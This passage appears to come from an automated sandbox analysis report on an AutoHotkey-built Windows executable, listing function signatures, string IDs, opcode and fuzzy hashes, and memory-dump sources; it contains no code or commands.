                                                                                                                                                                              • API ID: CharKeyboardLayoutUpper
                                                                                                                                                                              • String ID: %s%s$*%s up::$MZ@$Return${Blind}%s%s{%s DownTemp}${RCtrl up}
                                                                                                                                                                              • API String ID: 1521781519-3819665344
                                                                                                                                                                              • Opcode ID: 00ad6ff7e6097c468761bf554df59c8cfd3c169258eb3c7de2453de6ab3a2a23
                                                                                                                                                                              • Instruction ID: f9d22b1be46fb244d68d21872ba938614a8d0855341de3a497f860e23224c328
                                                                                                                                                                              • Opcode Fuzzy Hash: 00ad6ff7e6097c468761bf554df59c8cfd3c169258eb3c7de2453de6ab3a2a23
                                                                                                                                                                              • Instruction Fuzzy Hash: 0F91B63260468085F7729B67E4103EE37A1F71E7D8F944106FB860BAE5DB3AC989C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharKeyboardLayoutUpper
                                                                                                                                                                              • String ID: %s%s$*%s up::$MZ@$Return${Blind}%s%s{%s DownTemp}${RCtrl up}
                                                                                                                                                                              • API String ID: 1521781519-3819665344
                                                                                                                                                                              • Opcode ID: fe56639fb938ddf3a45c6946978923287c62902f8192ece89911753bc003fb3e
                                                                                                                                                                              • Instruction ID: 808c477b45acf703b50beb10173a5430243f6759a5dabc34f71f9264d1b769a9
                                                                                                                                                                              • Opcode Fuzzy Hash: fe56639fb938ddf3a45c6946978923287c62902f8192ece89911753bc003fb3e
                                                                                                                                                                              • Instruction Fuzzy Hash: 4491B53260468085F772DB66A4103EE37A1F71E7D8F984206FB950BAE5DB3AC989C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateObjectText$BrushCapsDeviceFaceMetricsSelectSolidStock
                                                                                                                                                                              • String ID: DISPLAY
                                                                                                                                                                              • API String ID: 2398714746-865373369
                                                                                                                                                                              • Opcode ID: 7b216ff44e32401be298720efe145231ba628eda6b4fa0dec25718c931fc7afc
                                                                                                                                                                              • Instruction ID: 6d85efb1b7a1b1625aaa84e9d9eb9dd0622b9001570bd50e3a462713b8380839
                                                                                                                                                                              • Opcode Fuzzy Hash: 7b216ff44e32401be298720efe145231ba628eda6b4fa0dec25718c931fc7afc
                                                                                                                                                                              • Instruction Fuzzy Hash: BC81F032601A9187EB279F27D4903EE33A0F3597D8F548226EB9647EE4EB38C595C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharKeyboardLayoutUpper
                                                                                                                                                                              • String ID: %s%s$*%s up::$MZ@$Return${Blind}%s%s{%s DownTemp}${RCtrl up}
                                                                                                                                                                              • API String ID: 1521781519-3819665344
                                                                                                                                                                              • Opcode ID: 1451f302594c157b045a53fd357d119578f5a48e9ec638858d9eba1968704027
                                                                                                                                                                              • Instruction ID: 9114e389ffdffbaaba2951e23f0a8a93a6cb4b66d8d4afa5d33a9675d0756824
                                                                                                                                                                              • Opcode Fuzzy Hash: 1451f302594c157b045a53fd357d119578f5a48e9ec638858d9eba1968704027
                                                                                                                                                                              • Instruction Fuzzy Hash: 7081A43260468085F772DB66A4103EE77A1F75E7D8F944206FB850BAE5DB3AC985C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassCursorLoadRegister
                                                                                                                                                                              • String ID: AutoHotkeyGUI$P$RegClass
                                                                                                                                                                              • API String ID: 1693014935-1255895312
                                                                                                                                                                              • Opcode ID: 3df8e288f0ceaee3e3294d07c7ac17d03adc674ab24cd633cf1902125b14c2e6
                                                                                                                                                                              • Instruction ID: faadf84c82a5d8c7439a8458bdfda83ec3bc8e098af630e1b3cf89b5b35c63f7
                                                                                                                                                                              • Opcode Fuzzy Hash: 3df8e288f0ceaee3e3294d07c7ac17d03adc674ab24cd633cf1902125b14c2e6
                                                                                                                                                                              • Instruction Fuzzy Hash: CF51EB72609B8086E762DB26F94039A73E5F78CB84F14412AEBCD93B68DF38C454CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DriveType
                                                                                                                                                                              • String ID: :$CDRom$Fixed$Network$Ramdisk$Removable$Unknown
                                                                                                                                                                              • API String ID: 338552980-2138212569
                                                                                                                                                                              • Opcode ID: 0b450b676e35904a630711ed11b59bcbae0b0db75eac00644135fcede858965b
                                                                                                                                                                              • Instruction ID: 5ab737e9b32dd2bf42670551ebe357d5e1778dc65fae2f7c0ae650d4412a6b02
                                                                                                                                                                              • Opcode Fuzzy Hash: 0b450b676e35904a630711ed11b59bcbae0b0db75eac00644135fcede858965b
                                                                                                                                                                              • Instruction Fuzzy Hash: 95414A72704B8085F723DB22A4403E923A4B7997E4F925225FB29476F5EB38C685C709
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              • Not allowed as an output variable., xrefs: 0000000140025949
                                                                                                                                                                              • variable, xrefs: 0000000140025873
                                                                                                                                                                              • This dynamic variable is blank. If this variable was not intended to be dynamic, remove the % symbols from it., xrefs: 0000000140025738
                                                                                                                                                                              • _$#@, xrefs: 0000000140025801
                                                                                                                                                                              • This dynamically built variable name is too long. If this variable was not intended to be dynamic, remove the % symbols from it., xrefs: 0000000140025748
                                                                                                                                                                              • The following %s name contains an illegal character:"%-1.300s", xrefs: 000000014002587F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Not allowed as an output variable.$The following %s name contains an illegal character:"%-1.300s"$This dynamic variable is blank. If this variable was not intended to be dynamic, remove the % symbols from it.$This dynamically built variable name is too long. If this variable was not intended to be dynamic, remove the % symbols from it.$_$#@$variable
                                                                                                                                                                              • API String ID: 0-1451560060
                                                                                                                                                                              • Opcode ID: f8959629e6cd42db15bf4e9aa3e82111d9d445c8675019eae106e6fcd8f682f3
                                                                                                                                                                              • Instruction ID: 356bdbd87927b798a04959c5f339d84918a583e2ae1e257a9b5b602d9c0c9124
                                                                                                                                                                              • Opcode Fuzzy Hash: f8959629e6cd42db15bf4e9aa3e82111d9d445c8675019eae106e6fcd8f682f3
                                                                                                                                                                              • Instruction Fuzzy Hash: 2DC19CB1215A80C1FA62EB22E4543E973A5F74CBD9F84411AEB8D53AB1EB38C951C708
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AcquireLock
                                                                                                                                                                              • String ID: 0$Compile error %d at offset %d: %hs$MZ@
                                                                                                                                                                              • API String ID: 1242969663-621107290
                                                                                                                                                                              • Opcode ID: e29335d59e32361897001d4646b98702fcd985c05b191eb8ddd447f01cf61ed5
                                                                                                                                                                              • Instruction ID: 245aa2f261f75d079239efb59dcbfaed9c4bc1c98ee8b1b3152baed60bc75f0f
                                                                                                                                                                              • Opcode Fuzzy Hash: e29335d59e32361897001d4646b98702fcd985c05b191eb8ddd447f01cf61ed5
                                                                                                                                                                              • Instruction Fuzzy Hash: 45A15672204B9486EB62CF17E4943E977A0F748BC8F448116FB8A57BB8EB39C955C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharUpper
                                                                                                                                                                              • String ID: %i-%i$%s%s%s%s%s%s$(no)$MZ@$OFF$PART
                                                                                                                                                                              • API String ID: 9403516-70096370
                                                                                                                                                                              • Opcode ID: c9a1b86bd3e5397fbdbe6d511eb2e860a999cc62dd8c5877702d9e8f1336c708
                                                                                                                                                                              • Instruction ID: 0f23f9dc4c8a1d4d696e65ffcdd29d3178d4a2903055a88051ac92913a1bffd2
                                                                                                                                                                              • Opcode Fuzzy Hash: c9a1b86bd3e5397fbdbe6d511eb2e860a999cc62dd8c5877702d9e8f1336c708
                                                                                                                                                                              • Instruction Fuzzy Hash: A5A19FB2205BD191EB66DB22F0507E97BA0F74DBC4F48551AEB8927BB4DB38C554C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AvailableClipboardFormatWindow$Text$ForegroundLengthVisible
                                                                                                                                                                              • String ID: <<>>
                                                                                                                                                                              • API String ID: 4287936912-913080871
                                                                                                                                                                              • Opcode ID: 8280338d1d6a3c9ed5faf558040a3d9b3df7e2c4c11eba5e702f6a614fa2d13f
                                                                                                                                                                              • Instruction ID: 9e068f2c847bed877f68631d149dce5f1cc4345da1f1ab67a07ecd82af0949cc
                                                                                                                                                                              • Opcode Fuzzy Hash: 8280338d1d6a3c9ed5faf558040a3d9b3df7e2c4c11eba5e702f6a614fa2d13f
                                                                                                                                                                              • Instruction Fuzzy Hash: 5391D5B270864081FB27DB23A6403E92791A78CBD4F0A4525FB8A17AF7CF38D8558748
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$AttributesLayered_invalid_parameter_noinfo
                                                                                                                                                                              • String ID: Off
                                                                                                                                                                              • API String ID: 3662379550-334568355
                                                                                                                                                                              • Opcode ID: 60682ecdf687e8977f7980419b92fe588e1760c9bd56b75e18718d9f67903aab
                                                                                                                                                                              • Instruction ID: 54d9d253576e537abca5202d4d5e93c7fa89a5ff414b5af5d274d5fa8ef3d72b
                                                                                                                                                                              • Opcode Fuzzy Hash: 60682ecdf687e8977f7980419b92fe588e1760c9bd56b75e18718d9f67903aab
                                                                                                                                                                              • Instruction Fuzzy Hash: 8C510F313046A182FB629B1BA4403FE66A0FB8CBD4F854231BF52676F2DE78C541D744
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ModuleNameOpenProcess$BaseCloseDeviceFileHandleQuery
                                                                                                                                                                              • String ID: :
                                                                                                                                                                              • API String ID: 1931077953-336475711
                                                                                                                                                                              • Opcode ID: 2935f87d620b45e46750f5958d89ede72ba9fb2bcb6f71f79c4beb8cc7e1c59d
                                                                                                                                                                              • Instruction ID: 0e8757b586063145778903e088da1898232c2ad5c4476d8fc7ca5f44d1860102
                                                                                                                                                                              • Opcode Fuzzy Hash: 2935f87d620b45e46750f5958d89ede72ba9fb2bcb6f71f79c4beb8cc7e1c59d
                                                                                                                                                                              • Instruction Fuzzy Hash: BC41AB71204A8192EB76DB53A8443E973A0FB98BC1F044227AF5947BF8EE39C9858704
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Object$CreateDeleteText$CapsDeviceFaceFontIconInfoMetricsRectSelectStock
                                                                                                                                                                              • String ID: DISPLAY
                                                                                                                                                                              • API String ID: 3544818348-865373369
                                                                                                                                                                              • Opcode ID: da5736ec3df926be64205fe302eab28e95b290c12d1b266e9472528bad46daff
                                                                                                                                                                              • Instruction ID: 67cb6236386bfcb393edd4fc9eb935774adb38559d34a7c006f52a65362d431a
                                                                                                                                                                              • Opcode Fuzzy Hash: da5736ec3df926be64205fe302eab28e95b290c12d1b266e9472528bad46daff
                                                                                                                                                                              • Instruction Fuzzy Hash: AD418F326017818AEB279F2694543EE37B0F399B84F188119EB4A07BA4DB39C595C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LongWindow$ErrorLast$InvalidateRect
                                                                                                                                                                              • String ID: +-^
                                                                                                                                                                              • API String ID: 3388266950-1738561039
                                                                                                                                                                              • Opcode ID: 5e8fe7a1c114fae472db693d349abad126b2ad28f40d2081be0960c95d0ecd64
                                                                                                                                                                              • Instruction ID: c6dd063d3170bb1408efe806915cf4dd2fb55dc0e2e483b9874a5b4879949524
                                                                                                                                                                              • Opcode Fuzzy Hash: 5e8fe7a1c114fae472db693d349abad126b2ad28f40d2081be0960c95d0ecd64
                                                                                                                                                                              • Instruction Fuzzy Hash: 79319C31204A8091FA6ADB23D5943FD2392BB4CBE4F544715EB2697AF0DB7EC586E300
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ObjectText$CapsCreateDeviceFaceMetricsSelectStock
                                                                                                                                                                              • String ID: DISPLAY
                                                                                                                                                                              • API String ID: 2440455471-865373369
                                                                                                                                                                              • Opcode ID: 5b97d5be47e8b8656e8eff2459fc4e450176f0a4993cf15bfc7a6d53ee72cf7a
                                                                                                                                                                              • Instruction ID: f28422f8fe1c12afc2f71dd1a7b459f1d75d16913336127d82ad0e735817c376
                                                                                                                                                                              • Opcode Fuzzy Hash: 5b97d5be47e8b8656e8eff2459fc4e450176f0a4993cf15bfc7a6d53ee72cf7a
                                                                                                                                                                              • Instruction Fuzzy Hash: A8319E36204B428AEB7B8F2B94507EA33A0F359784F144119EF5607FA8DB398995CB40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ObjectText$CapsCreateDeviceFaceMetricsSelectStock
                                                                                                                                                                              • String ID: DISPLAY
                                                                                                                                                                              • API String ID: 2440455471-865373369
                                                                                                                                                                              • Opcode ID: 98a24de7ba55c04d38065658e27677ee63340f0f86d4fce66029148b24d1cf15
                                                                                                                                                                              • Instruction ID: ea72498954af463fb252bc9d2173c1445986659b72ea92234b55286d26e295d0
